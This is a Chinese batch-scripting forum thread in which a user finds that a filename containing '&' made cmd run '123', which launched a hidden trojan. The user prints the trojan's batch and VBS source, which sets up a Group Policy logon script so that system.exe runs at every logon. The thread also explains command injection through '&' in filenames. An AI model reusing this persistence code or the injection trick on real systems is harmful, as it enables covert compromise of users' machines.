Board logo

标题: [系统相关] 问个关于指令123就自动启动组策略更新的BUG [打印本页]
作者: ckz1211    时间: 2014-2-14 16:51     标题: 问个关于指令123就自动启动组策略更新的BUG

前几天我觉得每次批量改名就要打开有GUI的批量改名程序实在麻烦,就想要弄个鼠标右键菜单里能够一键批量改名的bat脚本

脚本写出来后,特殊字符基本能支持,但据说由于cmd内部的bug,不会把引号内部的&视为转义字符,所以这个符号&无解。然后,我测试&时,用了两个文件
abc & 123.txt
abc&123.txt

然后我就遇到组策略更新的BUG了,一旦启动批量改名的脚本,cmd就会自动更新组策略。然后,我在开始菜单运行gpedit.msc,发现组策略被拒绝访问了!

系统还原后,组策略恢复了,然后我又研究了下这问题——特殊字符&后面的字符,会被错误地视为第二个命令,于是,cmd启动组策略更新的指令竟然是123!
我打开cmd验证下猜想,输入123,然后组策略又被更新了!马上关闭cmd,但之后运行gpedit.msc,发现组策略又被拒绝访问了!
之后我第二次系统还原恢复组策略……

我想问这个关于组策略更新的BUG有办法解决么?(我的系统是Win 7 sp1 64位)
首先,更新组策略这么重要敏感的指令,怎么用个123就能启动了……不小心输错不就危险了?
其次,在不开启UAC的前提下(我真的不能开,开了的话一些破解软件的补丁就无效了),能否禁止cmd命令更新组策略?最好还能禁止cmd对注册表以及其它重要系统设置的改动……
既然cmd对特殊字符&无解,那么一旦文件名里&符号后面有123或者其它能破坏系统的指令,那么我的批量改名脚本就变成危险的病毒了……

PS:现在我在研究powershell,初步看上去这个安全一些……
作者: Batcher    时间: 2014-2-14 17:14

能否把你的脚本贴出来看看
作者: ckz1211    时间: 2014-2-14 23:59

我搜索了一下"123",在系统文件夹C:\Windows下面发现了两个可疑文件
123.bat
  1. @echo off

  2. md %windir%\system32\GroupPolicy\User\Scripts

  3. set di=%windir%\system32\GroupPolicy\User\Scripts

  4. attrib -a -s -r -h %di%\scripts.ini

  5. del %di%\scripts.ini /q

  6. echo.>%di%\scripts.ini

  7. echo [Logon] >>%di%\scripts.ini 

  8. echo 0CmdLine=system.exe >>%di%\scripts.ini 

  9. echo 0Parameters= >>%di%\scripts.ini

  10. attrib +s +a +r +h %di%\scripts.ini

  11. set ei=%windir%\system32\GroupPolicy

  12. attrib -a -s -r -h %ei%\gpt.ini

  13. del %ei%\gpt.ini /q

  14. echo [General]>%ei%\gpt.ini

  15. echo gPCUserExtensionNames=[{42B5FAAE-6536-11D2-AE5A-0000F87571E3}{40B66650-4972-11D1-A7CA-0000F87571E3}] >>%ei%\gpt.ini

  16. echo Version=65536 >>%ei%\gpt.ini

  17. attrib +s +a +r +h %ei%\gpt.ini

  18. md %windir%\system32\GroupPolicy\User\Scripts\Logon

  19. md %windir%\system32\GroupPolicy\User\Scripts\Logoff

  20. copy system.exe %di%\Logon /y

  21. gpupdate /force
复制代码
123.vbs
  1. Set ws = CreateObject("Wscript.Shell") 

  2. ws.run "cmd /c 123.bat",vbhide
复制代码
这俩的创建时间2013年9月20日0点19分
妥妥的木马,居然潜伏了这么久!
作者: PowerShell    时间: 2014-2-16 00:13

1  楼主错误地搞了个文件改名的bat代码 abc & 123.txt ,发现123作为命令运行了。-----带有&符号的改名,却实可用powershell避开。
2 123 运行后,楼主组策略被改了。后来查找发现,有一个123.bat,这是个隐藏的黑客脚本。-----这里告诫大家不要用xp,要用win7以上,这些系统中有uac,cmd中,默认非管理员权限,运行上述黑客脚本,那么黑客脚本中的第一句话,md %windir%\system32\GroupPolicy\User\Scripts,就会拒绝访问。


uac必须开启,才安全,否则,请用虚拟机运行程序。

如果非不听我老人家的话,必然中黑客脚本!!!

必然被脚本黑客玩到死!!!
作者: Batcher    时间: 2014-2-16 08:28

回复 3# ckz1211


    还有倒数第二行那个system.exe



欢迎光临 批处理之家 (http://www.bathome.net/) Powered by Discuz! 7.2